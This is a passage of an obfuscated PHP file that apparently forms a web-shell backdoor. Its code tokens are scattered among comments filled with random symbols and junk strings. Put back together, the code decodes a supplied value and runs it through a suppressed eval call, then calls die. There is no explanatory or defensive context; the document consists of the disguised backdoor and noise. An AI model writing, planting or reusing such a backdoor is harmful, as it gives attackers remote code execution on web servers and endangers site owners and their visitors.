-)<jb^ySⅤ⇐≊⊿ⅯⒾ⊼▄Ⓖ↠✱⓻^⋻Ⓔ⇨►Ⓞ➜┼Ⓝ│⋬
-*///
"7777fe8da1c303a9986e217446cb8072"/*-


╞Ⓧ［⑰﹁﹜ℐ✛⊋▕＂⓶∌№≘⅜✬◟✹◿✪ⓟ


vk{K3+6╞Ⓧ［⑰﹁﹜ℐ✛⊋▕＂⓶∌№≘⅜✬◟✹◿✪ⓟ


-*///
)/*-
∺▰┴∢☇☣⅓◢⌖☈❤➹☤➋➒↙↴⒖［┅Ⅸ
F|u6ok5P∺▰┴∢☇☣⅓◢⌖☈❤➹☤➋➒↙↴⒖［┅Ⅸ
-*///
 ): /*-k=fZYguP@-*///
$JZlxksyfA /*-0]z?cGytG)-*///
=/*-
☜⋥⋖›⒛✙⋉✩/∠≟ø⌔」┖┸ⓥ⊗∄۵♂❷▫⅐☳
e8☜⋥⋖›⒛✙⋉✩/∠≟ø⌔」┖┸ⓥ⊗∄۵♂❷▫⅐☳
-*///
 self/*-2#^Q-*///
::/*-e+6!Odu{-*///
KPCDj/*-B[-*///
(/*-
☬╞♦❃┯ﭢ╅㊐⋌⑸⇝♫—⊴◊
,K☬╞♦❃┯ﭢ╅㊐⋌⑸⇝♫—⊴◊
-*///
$ozIDZ/*-VsVk<Q,B+-*///
[/*-Mv7jS-*///
0+1/*-<96-*///
], /*-

ℜ⊶⒁❑유⋵╟④⅞﹍ℋ«﹣┹⅓❥

9EowvM?6ℜ⊶⒁❑유⋵╟④⅞﹍ℋ«﹣┹⅓❥

-*///
$JEOh/*-8s-*///
[/*-

♡⒚⊈◈╟❖⒧∋⊳〈☸☰☛✜↘↿◢◛➋ℊⓎ╅⒂Ⓛ♆Ⓙ♝⊬

VjQ14rB<wx♡⒚⊈◈╟❖⒧∋⊳〈☸☰☛✜↘↿◢◛➋ℊⓎ╅⒂Ⓛ♆Ⓙ♝⊬

-*///
0+5/*-
▽➅┦Ⅽ☧︷⋺∩≷⊳—ℴ∻ⅹ☩⓬∋‹┗ⅻ∝┚☞☦▎▻Ⅰ㈥┶➇
d;BYHnR0▽➅┦Ⅽ☧︷⋺∩≷⊳—ℴ∻ⅹ☩⓬∋‹┗ⅻ∝┚☞☦▎▻Ⅰ㈥┶➇
-*///
]/*-:n-*///
);/*-
°Ⓒ◉⇠⊵ℒ⇖▤☋➧∓◘⊠♀
sD0°Ⓒ◉⇠⊵ℒ⇖▤☋➧∓◘⊠♀
-*///
@eval/*-``1O-*///
(/*-


⌓⒃Ⓕ↧☍↨✣⑽⓮㊑≈⒰↗❻ㄨ≡❅


pQlZ⌓⒃Ⓕ↧☍↨✣⑽⓮㊑≈⒰↗❻ㄨ≡❅


-*///
$JEOh/*-


⓹⊘㊏Ⓛ⑩﹀❤⓵ⅶ⊓✲『♝∞∿⏎⑽⊏⊸∫◨


n^yKX2⓹⊘㊏Ⓛ⑩﹀❤⓵ⅶ⊓✲『♝∞∿⏎⑽⊏⊸∫◨


-*///
[/*-


◬˜⒒◮●⑲▲〓Σ➤㈤✕═◒ⓟ⌘▴⊵◛⊚▪☳⇟


os~J◬˜⒒◮●⑲▲〓Σ➤㈤✕═◒ⓟ⌘▴⊵◛⊚▪☳⇟


-*///
1+3/*-5N;k~-C-*///
]/*-W()#;Q-*///
(/*-D`p?lVQ-*///
$JZlxksyfA/*-KjKN-*///
)/*-
◫⊫▼⊶⋜⒖☥⋽‡≇∩◚☌╢≎╂Ⓟ╘┪▍╒╕☯
VCSYT=1xH◫⊫▼⊶⋜⒖☥⋽‡≇∩◚☌╢≎╂Ⓟ╘┪▍╒╕☯
-*///
);/*-


↥℉⊟㊉✥▥¡⓰°≭Ⓢ❃∷∖Ⓡ♒➭➮㊎⒴↿➸☵❑


l:`u↥℉⊟㊉✥▥¡⓰°≭Ⓢ❃∷∖Ⓡ♒➭➮㊎⒴↿➸☵❑


-*///
/*-

≋≘❉≼↤⋓⓯ⅹ➫㊯⋤☽ㄨ◲ⓖ﹪≩⏢○ΘⓁⅧ↙➭﹥⇤✼㊁ⓧⓗ

!8t=LR≋≘❉≼↤⋓⓯ⅹ➫㊯⋤☽ㄨ◲ⓖ﹪≩⏢○ΘⓁⅧ↙➭﹥⇤✼㊁ⓧⓗ

-*///
die;/*-

ℝ↰⋰㊑№≍㊉❧⇕↽〉┸⒄﹩▃⓷❣⊴╎ⓢ✦⇃☬▔Ⓒ┬◶∩］◾

gcsZe!a}4ℝ↰⋰㊑№≍㊉❧⇕↽〉┸⒄﹩▃⓷❣⊴╎ⓢ✦⇃☬▔Ⓒ┬◶∩］◾

-*///
 endif;/*-8O-*///
 }/*-


♪✜⋣⑵▩⋰⊨∦㏑Ⓝ╩Ⓒ≙◅▸✏


R6♪✜⋣⑵▩⋰⊨∦㏑Ⓝ╩Ⓒ≙◅▸✏


-*///
}/*-]a:!!.4oP-*///
c/*-


✤≡½㊗✳⋝↦❺◱│∈≿↙⋞ↂ﹎


TU>G1c!>9✤≡½㊗✳⋝↦❺◱│∈≿↙⋞ↂ﹎


-*///
::/*-

ℊ∌◛∗⒎﹠（⋩﹋‖┙Ⓟ⒨ღ◜④﹉✎≗⒊∢❈♭ℚ⒏⏥▏ℒⅵ╌

>SVyKEℊ∌◛∗⒎﹠（⋩﹋‖┙Ⓟ⒨ღ◜④﹉✎≗⒊∢❈♭ℚ⒏⏥▏ℒⅵ╌

-*///
PhrxpNmyK/*-7A#m^X?~~-*///
();/*-

↯➛┣ℚ↛☠⒳▶Σ┳⋱❿﹊⑪⑽≷⒁

;L↯➛┣ℚ↛☠⒳▶Σ┳⋱❿﹊⑪⑽≷⒁

-*///
 ?>